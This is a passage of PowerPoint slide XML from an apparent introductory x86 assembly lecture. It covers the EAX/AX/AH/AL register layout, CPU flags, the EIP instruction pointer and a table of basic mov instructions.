            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="TextBox 10"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6295239" y="1841262"/>
            <a:ext cx="725317" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>1111</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>F</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="TextBox 11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7020556" y="1846565"/>
            <a:ext cx="725317" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>0101</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>5</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="TextBox 12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="683568" y="1988840"/>
            <a:ext cx="813043" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>32 bits</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="TextBox 13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4844605" y="3501008"/>
            <a:ext cx="725317" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>1000</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>8</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="TextBox 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5569922" y="3501008"/>
            <a:ext cx="725317" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>0001</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>1</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="TextBox 15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6297358" y="3485276"/>
            <a:ext cx="725317" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>1111</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>F</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="TextBox 16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7022675" y="3502749"/>
            <a:ext cx="725317" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>0101</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>5</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Rectangle 18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4844605" y="4740876"/>
            <a:ext cx="1519881"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4844605" y="4884892"/>
            <a:ext cx="725317" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>1000</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>8</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="TextBox 20"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5569922" y="4884892"/>
            <a:ext cx="725317" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>0001</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>1</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="TextBox 21"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6297358" y="4869160"/>
            <a:ext cx="725317" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>1111</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>F</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="TextBox 22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7022675" y="4886633"/>
            <a:ext cx="725317" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>0101</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>5</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="Rectangle 23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6364486" y="4740876"/>
            <a:ext cx="1519881"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Down Arrow 24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6084168" y="2780928"/>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Down Arrow 25"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5364088" y="429309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Down Arrow 26"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6842655" y="4237755"/>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3653397" y="3623775"/>
            <a:ext cx="813043" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>16 bits</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="TextBox 28"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3678958" y="5025132"/>
            <a:ext cx="696024" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>8</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> bits</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="TextBox 29"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4374982" y="1385736"/>
            <a:ext cx="547650" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>EAX</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="TextBox 30"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6565044" y="2987660"/>
            <a:ext cx="437940" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>AX</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="TextBox 31"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5724128" y="4417775"/>
            <a:ext cx="461986" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>AH</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="TextBox 32"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7202695" y="4417775"/>
            <a:ext cx="415498" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>AL</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="9123417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smtClean="0"/>
              <a:t>Flags</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>ZF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>: zero flag</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>CF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>: carry flag</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>SF: sign flag</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>TF: trap flag</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>…..</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" smtClean="0"/>
              <a:t>Instruction Pointer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>EIP: contains the memory address of the next instruction to be executed -&gt; t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>ells CPU what to do next</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:effectLst>
                <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                  <a:srgbClr val="000000">
                    <a:alpha val="43137"/>
                  </a:srgbClr>
                </a:outerShdw>
              </a:effectLst>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3995937" y="1772816"/>
            <a:ext cx="4896544" cy="1631216"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent6">
              <a:lumMod val="20000"/>
              <a:lumOff val="80000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" i="1" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>When EIP is corrupted, the CPU will not be able to fetch legitimate code  to execute,  therefore the program  running at the time will likely crash. When you control EIP, you can control what is executed by the CPU.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="36094201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smtClean="0"/>
              <a:t>Simple instructions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>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15866320"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="179512" y="1772816"/>
          <a:ext cx="4392488" cy="4314240"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="2232248"/>
                <a:gridCol w="2160240"/>
              </a:tblGrid>
              <a:tr h="825580">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2000" dirty="0" smtClean="0"/>
                        <a:t>Instruction</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="2000" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2000" dirty="0" smtClean="0"/>
                        <a:t>Description</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="2000" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="425325">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2200" dirty="0" err="1" smtClean="0">
                          <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>mov</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2200" dirty="0" smtClean="0">
                          <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2200" dirty="0" err="1" smtClean="0">
                          <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>eax</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2200" dirty="0" smtClean="0">
                          <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2200" dirty="0" err="1" smtClean="0">
                          <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>ebx</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="2200" dirty="0">
                        <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-GB" sz="1400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="425325">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2200" dirty="0" err="1" smtClean="0">
                          <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>mov</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2200" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2200" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>eax</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2200" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>, 0x40</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="2200" dirty="0">
                        <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-GB" sz="1400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="481220">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2200" dirty="0" err="1" smtClean="0">
                          <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>mov</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2200" dirty="0" smtClean="0">
                          <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2200" dirty="0" err="1" smtClean="0">
                          <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>eax</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2200" dirty="0" smtClean="0">
                          <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>,</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2200" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> [0x4037c4]</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="2200" dirty="0">
                        <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-GB" sz="1400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="425325">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2200" dirty="0" err="1" smtClean="0">
                          <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>mov</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2200" dirty="0" smtClean="0">
                          <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2200" dirty="0" err="1" smtClean="0">
                          <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>eax</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2200" dirty="0" smtClean="0">
                          <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>, [</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2200" dirty="0" err="1" smtClean="0">
                          <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>ebx</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2200" dirty="0" smtClean="0">
                          <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>]</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="2200" dirty="0">
